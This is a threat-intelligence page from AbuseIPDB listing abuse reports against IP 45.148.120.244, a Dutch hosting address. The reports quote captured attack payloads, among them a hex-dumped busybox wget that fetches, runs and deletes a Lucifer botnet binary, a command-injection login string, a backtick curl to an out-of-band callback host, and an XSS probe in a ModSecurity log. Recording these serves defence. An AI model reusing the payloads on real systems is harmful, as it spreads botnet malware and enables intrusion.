AbuseIPDB » 45.148.120.244
45.148.120.244
This IP was reported 13 times. Confidence of
Abuse
is 0% : ?
ISP
SpectraIP B.V.
Usage Type
Data Center/Web Hosting/Transit
ASN
AS62068
Domain Name
spectraip.net
Country
๐ณ๐ฑ
Netherlands
City
Amsterdam, North Holland
IP info including ISP, Usage Type, and Location provided
by IPInfo . Updated weekly.
IP Abuse Reports for 45.148.120.244 :
This IP address has been reported a total of
13
times from
6 distinct
sources.
45.148.120.244 was first reported on
December 11th 2023 , and the most recent report was
1 year ago
Old Reports:
The most recent abuse report for this IP address is from
1 year ago
Reporter
IoA Timestamp (UTC)
Comment
Categories
2024-08-03 10:23:00
(1 year ago)
/tmp||cd /var; |
00000040 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 |/bin/busybox wge|
00000 ...
show more
/tmp||cd /var; |
00000040 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 |/bin/busybox wge|
00000050 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 38 2e |t http://45.148.|
00000060 31 32 30 2e 32 34 34 2f 6d 70 73 6c 3b 20 63 68 |120.244/mpsl; ch|
00000070 6d 6f 64 20 2b 78 20 6d 70 73 6c 20 7c 7c 20 63 |mod +x mpsl || c|
00000080 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e |hmod 777 mpsl; .|
00000090 2f 6d 70 73 6c 20 72 74 32 3b 20 72 6d 20 2d 66 |/mpsl rt2; rm -f|
000000a0 20 6d 70 73 6c 3b 20 74 2e 6d 65 2f 79 79 74 72 | mpsl; t.me/yytr|
000000b0 62 75 62 62 6c 65 73 20 7c 20 43 6f 72 64 3a 20 |bubbles | Cord: |
000000c0 62 75 62 62 6c 65 73 6e 65 74 20 7c 20 4c 75 63 |bubblesnet | Luc|
000000d0 69 66 65 72 20 62 6f 74 6e 65 74 20 6f 6e 20 74 |ifer botnet on t|
000000e0 6f 70 21 23 0d 0a |op!#
show less
Web App Attack
๐ซ๐ท
threatquery.com
2024-07-01 10:41:05
(1 year ago)
Spreading malware
Exploited Host
๐น๐ผ
ๅ
็พ
2024-05-02 08:34:00
(2 years ago)
op=login&username=admin|pwd&password=123456
Web App Attack
๐น๐ผ
ๅ
็พ
2024-05-01 14:18:00
(2 years ago)
/include/makecvs.php?Event=%60curl+http%3a//coet2k580cveacpolepg9m3ew6antpcdy.oast.pro+-H+'User-Agen ...
show more
/include/makecvs.php?Event=%60curl+http%3a//coet2k580cveacpolepg9m3ew6antpcdy.oast.pro+-H+'User-Agent%3a+zAT7ch'%60
show less
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-04-18 18:56:08
(2 years ago)
(mod_security) mod_security (id:212620) triggered by 45.148.120.244 (45-148-120-244.hosted-by.phanes ...
show more
(mod_security) mod_security (id:212620) triggered by 45.148.120.244 (45-148-120-244.hosted-by.phanes-cloud.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Apr 18 14:56:02.276136 2024] [security2:error] [pid 25620] [client 45.148.120.244:33448] [client 45.148.120.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<script\\\\b" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "65"] [id "212620"] [rev "4"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack||ftp.cognicom.com|F|2"] [data "Matched Data: <script found within REQUEST_URI: /mail/src/compose.php?mailbox=</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "ftp.cognicom.com"] [uri "/mail/src/compose.php"] [unique_id "ZiFswuxI_y-7A8xuJKkAWwAAAAY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
2024-04-18 04:33:31
(2 years ago)
Aggressive web scan
Web App Attack
2024-04-15 22:33:31
(2 years ago)
Aggressive web scan
Web App Attack
2024-04-12 00:46:33
(2 years ago)
Common attack or app scan event detected and blocked
Port Scan
Hacking
Web App Attack
2024-04-11 08:33:31
(2 years ago)
Aggressive web scan
Web App Attack
2024-03-22 14:17:17
(2 years ago)
Common attack or app scan event detected and blocked
Port Scan
Hacking
Web App Attack
2024-01-10 15:23:31
(2 years ago)
Aggressive web scan
Web App Attack
2023-12-23 05:18:30
(2 years ago)
Aggressive web scan
Web App Attack
2023-12-11 11:38:30
(2 years ago)
Aggressive web scan
Web App Attack
Showing 1 to
13
of 13 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ
Recently Reported IPs: